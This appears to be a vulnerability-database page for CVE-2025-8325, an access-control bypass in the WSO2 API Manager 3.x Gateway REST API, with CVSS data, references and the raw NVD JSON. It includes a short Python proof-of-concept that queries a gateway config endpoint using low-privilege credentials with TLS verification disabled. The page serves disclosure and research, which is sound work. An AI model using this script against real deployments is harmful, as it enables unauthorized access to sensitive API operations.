CVE-2025-8325

Description

The software fails to enforce role-based access controls for certain Gateway API invocations. Users with the 'Internal/Everyone' role can invoke these APIs, bypassing intended permission checks. This same vulnerability also affects Internal Service APIs, potentially exposing them in WSO2 APIM 3.x versions. A malicious actor with a valid user account on a vulnerable deployment can perform sensitive operations against the Gateway REST API regardless of their actual roles or privileges. This could lead to unintended behavior or misuse, particularly in production environments.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WSO2 API Manager 3.x

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Exploit for CVE-2025-8325: WSO2 API Manager RBAC Bypass
# Target: Vulnerable WSO2 Gateway API endpoint

target_url = "https://<target-host>:9443/api/am/gateway/v1/configs/endpoint"

# Credentials for a user with 'Internal/Everyone' role (Low privilege)
username = "low_priv_user"
password = "user_password"

# Send request to sensitive API without admin rights
try:
    response = requests.get(
        target_url,
        auth=(username, password),
        verify=False  # Ignore SSL certificate verification if needed
    )

    if response.status_code == 200:
        print("[+] Vulnerability Exploited Successfully!")
        print("[+] Response:", response.text)
    else:
        print("[-] Exploit failed. Status Code:", response.status_code)

except Exception as e:
    print("[-] An error occurred:", str(e))

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-8325
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-8325
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-8325/
[4] VulDB https://vuldb.com/cve/CVE-2025-8325
[5] https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2025-4401/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-8325", "sourceIdentifier": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "published": "2026-05-11T10:16:13.037", "lastModified": "2026-05-11T10:16:13.037", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "The software fails to enforce role-based access controls for certain Gateway API invocations. Users with the 'Internal/Everyone' role can invoke these APIs, bypassing intended permission checks. This same vulnerability also affects Internal Service APIs, potentially exposing them in WSO2 APIM 3.x versions.\n\nA malicious actor with a valid user account on a vulnerable deployment can perform sensitive operations against the Gateway REST API regardless of their actual roles or privileges. This could lead to unintended behavior or misuse, particularly in production environments."}], "metrics": {"cvssMetricV31": [{"source": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-281"}]}], "references": [{"url": "https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2025-4401/", "source": "ed10eef1-636d-4fbe-9993-6890dfa878f8"}]}}